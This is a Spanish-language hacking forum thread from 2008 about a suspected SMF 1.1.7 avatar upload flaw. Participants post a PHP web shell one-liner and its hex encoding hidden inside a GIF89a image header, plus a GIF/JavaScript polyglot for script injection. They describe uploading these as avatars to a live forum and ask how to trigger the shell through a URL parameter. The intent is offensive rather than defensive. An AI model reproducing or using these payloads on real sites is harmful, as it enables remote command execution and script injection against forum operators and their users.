[Duda] Existe o no el Bug SMF 1.1.7

Iniciado por Dacan, 24 Diciembre 2008, 01:11 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2
Acciones del Usuario

shimpei

#10
25 Diciembre 2008, 19:15 PM
gracias por la aclaracion  ;D
asi que si quiero inyectar codigo JS tengo que usar "= 1 y "/*" and "*/"."
y si solo quiero agregar la shellcita <?php system($_GET[cmd]); ?>
tengo que dejar la cabecera tal como esta no? (GIF89a)
quedaria algo asi hexadecimalmente

474946383961000100800100000000FFFFFF21FE133C3F70687020

73797374656D28245F4745545B636D645D293B203F3E002C000000000

10001000002024401003B
DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.soportedsr.ar.gd

AlbertoBSD

#11
25 Diciembre 2008, 22:08 PM
Bien si vemos si lo vemos como javascript se prodria entender un poco mejor.

Código (javascript) [Seleccionar]

GIF89a=1
/*Basura Binaria whatever!!*/
alert("xD");
/*Mas basura*/


Eso es para injectar JS desde alguna pagina vulnerable, se podria injectar PHP o cualquier otro leguje, sin embargo
para el php como pueden ver en la imagen de muestra de ese ejemplo:
:http://www.flickr.com/photos/matteocarli/580869084/

No importan los caracteres Binarios, ahora lo que si importa es el navegador. shimpei no me he puesto a ver la secuencia hexadecimal que se genera pero me imagino que si entendistes el ejemplo si va a funcionar.

Saludos!


Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

shimpei

#12
26 Diciembre 2008, 00:34 AM
si lo entendi, estoy probandolo en un smf 1.1.7 al cual siempre le tiro XD
lo unico que consegui es que intentando el phpinfo me tire un error 500  XD
seguire viendo si se puede hacer algo pero de momento inyecte ambos codigos y los subi como avatar y no paso nada
DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.soportedsr.ar.gd

Dacan

#13
26 Diciembre 2008, 01:06 AM
Recuerda no es seguro de que exista dicho bug pero lo mas probable ya que segun el encontraron  esos códigos.

Creo que debe ser así:  imagen.gif?cmd=Is (Ejemplo)

Me podrías pasar la imagen gif con el código ya inyectado, te lo agradecería mucho. 

Saludos, Dacan  :D

shimpei

#14
26 Diciembre 2008, 03:53 AM Ultima modificación: 26 Diciembre 2008, 04:16 AM por shimpei
a menos que quieras inyectar codigo JS solo basta con que con el gimp lo agreges como comentario. si queres te la spaso por pm.
aun no entiendo muy bien como se dispararia la shell, para ver un avatar seria asi la direccion http://www.explotame.com/foro/index.php?action=dlattach;attach=110;type=avatar
como habria que manipularla?
DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.soportedsr.ar.gd

shimpei

#15
28 Diciembre 2008, 01:25 AM Ultima modificación: 28 Diciembre 2008, 01:37 AM por shimpei
me parece que las nueves versiones de smf convierten las imagenes a png despues de que se suben asi que en ese transpaso se borra la ***** que le agregamos XD
voy a seguri haciendo pruebas al respecto

saludos

// si efectivamente tiene que ser una animacion si o si lo que subimos sino el smf la convierte en png.

a todo esto como se lanzaria el comentario que tenemos en la imagen en shell?
DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.soportedsr.ar.gd

Imprimir
Ir Arriba Páginas 1 2
Acciones del Usuario